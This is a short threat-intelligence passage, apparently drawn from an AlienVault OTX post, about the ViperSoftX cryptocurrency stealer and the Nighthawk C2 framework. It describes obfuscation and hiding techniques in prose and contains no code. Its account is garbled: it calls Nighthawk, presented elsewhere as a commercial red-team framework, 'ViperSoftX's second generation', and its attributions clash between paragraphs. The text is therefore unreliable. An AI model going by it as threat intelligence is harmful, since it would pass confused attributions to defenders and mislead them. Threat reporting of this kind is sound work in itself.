This multi-stage stealer exhibits interesting hiding capabilities, concealed as small PowerShell scripts on a single line in the middle of otherwise innocent-looking large log files, among others. ViperSoftX focuses on stealing cryptocurrencies, clipboard swapping, fingerprinting the infected machine, as well as downloading and executing arbitrary additional payloads, or executing commands.

Analysis of Nighthawk's PowerShell implementations shows that it implements several evasion techniques, including: hiding strings in hexadecimal form within variable names; randomizing the "main" function name for each variant; and using the two-byte representation ("\xXX") of ASCII characters to obfuscate strings in string constants. These techniques make it more difficult to identify malicious code when reviewing the source code, but still allow manual analysis and comparison with legitimate PowerShell scripts.

ViperSoftX's second generation of Nighthawk (version 2.6) aims to be a general-purpose framework for red team operations through the use of commercial licensing. The tool is modular, allowing the addition and removal of plug-ins depending on the target environment and actions to be performed, while retaining the core C2 infrastructure and API. The package has a dedicated commercial tier with additional features such as multi-threaded C2 responses, hiding PowerShell scripts in image files or VBScripts, smartURL support and extensive API documentation with examples for plug-in development.

Nighthawk's C2 infrastructure presents a new threat to organizations that are concerned about maintaining their security by deploying systems with multiple layers of protection. The complexity of Nighthawk's network communication, combined with the many plug-ins available, means it is hard to detect and prevent when deployed in an organization's network. This limitation is compounded by the fact that the client side is not detected by the typical behavioral defenses (e.g. signature-based IDS/IPS).

‍

Source: ViperSoftX: Hiding in System Logs and Spreading VenomSoftX - AlienVault - Open Threat Exchange